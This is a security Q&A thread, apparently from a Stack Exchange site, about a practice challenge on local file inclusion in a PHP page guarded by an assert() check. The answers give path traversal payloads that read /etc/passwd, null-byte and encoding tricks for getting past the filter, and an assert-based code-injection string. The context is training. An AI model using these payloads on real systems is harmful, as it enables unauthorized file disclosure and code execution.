1

I'm currently doing some practice about security and facing challenges provided in a website. One of them talks about LFI and I did figure out what to do, but I have no idea how to do this, so let's show you the problem:

Here is the url to hack:

http://example.com/challenge27/?page=contact

I'm asked to get the password in /etc/passwd, so the first idea that comes is to try some directory transversal:

http://example.com/challenge27/?page=.

This throws an exception: 

Warning: assert(): Assertion "strpos('includes/..php', '..') === false" failed

What is obvious is that the strpos detects every occurrence of '..' in the path and the assertion checks that this function returns a false value

Then I try it by adding a null byte at the end of the same url 

http://example.com/challenge27/?page=.%00

which gives me another hint:

Warning: file_exists() expects parameter 1 to be a valid path

But here I'm blocked, my goal is to inject the path to /etc/passwd like this:

http://example.com/challenge27/?page=../../../../etc/passwd

I feel like I can exploit the null byte solution but after trying many different urls either I got the file_exists() warning or the assert() one, I'm running out of ideas now, does somebody have one more hint to give?

SilverlightFox
  • 33,408
  • 6
  • 67
  • 178
onizukaek
  • 111
  • 1
  • 1
  • 5
  • 1
    I don't see this website (no DNS record), but what does http://my_practice_website.com/challenge27/?page=/etc/passwd show? – George Y. Dec 30 '16 at 00:18
  • @GeorgeY. You can't register a .com domain with underscores. OP uses it as a placeholder. That said it would be easier if we'd get the original site. – Arminius Dec 30 '16 at 00:34
  • Yes this url is fake, just for the example, if you want the real challenge website I can give it by PM. – onizukaek Dec 30 '16 at 00:40
  • @onizukaek Please include it in your question if possible. – Arminius Dec 30 '16 at 00:42
  • @Arminius sorry not possible, if I provide it here and you answer directly it would be against the website rules who intend to not give nor broadcast the solution until you solved it by yourself, therefore I cannot quote the right domain here – onizukaek Dec 30 '16 at 01:00
  • Do you know what version of PHP it's running? Null byte injection was fixed a while ago iirc. – grc Dec 30 '16 at 01:06
  • so what does /challenge27/?page=/etc/passwd show? And what does /challenge27/?page=%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd show? – George Y. Dec 30 '16 at 02:26
  • @GeorgeY page=/etc/passwd shows "File does not exist" and the second one does not pass the filter – onizukaek Dec 30 '16 at 12:31

2 Answers2

3

Usually it will be the path, followed by null byte in order to terminate the string when the C code runs that actually retrieves the file:

http://example.com/challenge27/?page=../../../../etc/passwd%00

Note that null byte characters don't work in up-to-date versions of PHP.

The other challenge is to get .. past the filter.

Try these to see if they can bypass this checking:

  • Try using 16-bit Unicode encoding (. = %u002e).
  • Try double URL encoding (. = %252e).
  • Try overlong UTF-8 Unicode encoding (. can be %c0%2e, %e0%40%ae, %c0ae)
Community
  • 1
SilverlightFox
  • 33,408
  • 6
  • 67
  • 178
  • Thank you for this information SilverlightFox, that's exactly what I wanted, I tried it, unfortunately the exploit was not what I thought, I get "Warning: file_exists() expects parameter 1 to be a valid path," I think I was completely wrong – onizukaek Dec 30 '16 at 12:56
  • I forgot to tell you the url I tried: /?page=%u002e%u002e/%u002e%u002e/%u002e%u002e/%u002e%u002e/etc/passwd%00 – onizukaek Dec 30 '16 at 13:20
1

Try passing a ' as input. If it throws an exception like Parse error: syntax error, unexpected ’’, ’’ (T_CONSTANT_ENCAPSED_STRING) in ... then it is vulnerable to code injection.

In that case you can open any file like:

' and die(show_source('/etc/passwd')) or '

more info at this write-up.

Shabgard
  • 11
  • 2